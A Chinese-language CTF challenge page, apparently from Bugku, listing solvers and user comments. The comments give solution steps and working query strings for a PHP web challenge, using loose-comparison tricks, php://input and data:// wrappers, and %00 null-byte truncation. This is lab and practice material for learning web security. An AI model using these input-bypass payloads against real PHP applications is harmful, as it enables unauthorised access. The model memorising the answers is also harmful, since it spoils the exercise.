评分(27)
解题动态
TLMSEC 攻破了该题 1天前
H&M 攻破了该题 2天前
粉红色的-毛 攻破了该题 2天前
flag与她皆失 攻破了该题 3天前
xyjwkg 攻破了该题 3天前
3024769318 攻破了该题 4天前
ndzdb 攻破了该题 6天前
dabinzi 攻破了该题 7天前
shengood 攻破了该题 7天前
mybugku26 攻破了该题 10天前
uuid777 攻破了该题 10天前
cxller 攻破了该题 12天前
echk 攻破了该题 12天前
Tychema7 攻破了该题 13天前
2333m 攻破了该题 14天前
fish12138 攻破了该题 14天前
404my 攻破了该题 14天前
277445839 攻破了该题 16天前
edadsadw 攻破了该题 16天前
评论
FTJJJ 21天前
举报
POST /hello.php?id=0e123&a=php://input&b=?aaaaaaaa HTTP/1.1 bugku is a nice plateform!
bugfuck2 28天前
举报
查看源代码可以发现注释提示“1p.html”,打开发现会跳转,使用view-source:http://ip/1p.html查看并解码,可以看到源代码,要注意id的值如果是0,在第一步的时候就会跳转会原页面,需要用松散比较绕过,比如id=0a
霓虹 4月前
举报
wp解答的源代码不一样,避雷
对对对对对对对对 5月前
举报
依旧有点意思
soha 6月前
举报
$b的限制eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)用%00字符截断绕过,$a用data://text/plain,文本内容,id=0传参
caicai0728 6月前
举报
解题参考:https://blog.csdn.net/cai_huaer/article/details/153694389?spm=1001.2014.3001.5501
2686213396 9月前
举报
bp抓包,发现第一个相应中有隐藏目录,访问进去,发现加密的JS代码,先后进行url、base64、url解码,得到目标php代码,,根据代码要求,绕过id,a,b的比较,获得flag
iNMB 10月前
举报
?id=00&a=data://text/plain;base64,YnVna3UgaXMgYSBuaWNlIHBsYXRlZm9ybSE=&b=......
zhuizhui 10月前
举报
?id=0a&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%00111bhv14
breeding 11月前
举报
curl '<ip:port>/1p.html'获取到word的值,先url解码,再把解码得到的注释用base64再解一次码就可以得到php源代码了,根据源代码构建url参数:/hello.php?id=00&a=data://text/plain,bugku%20is%20a%20nice%20platform!&b=.12345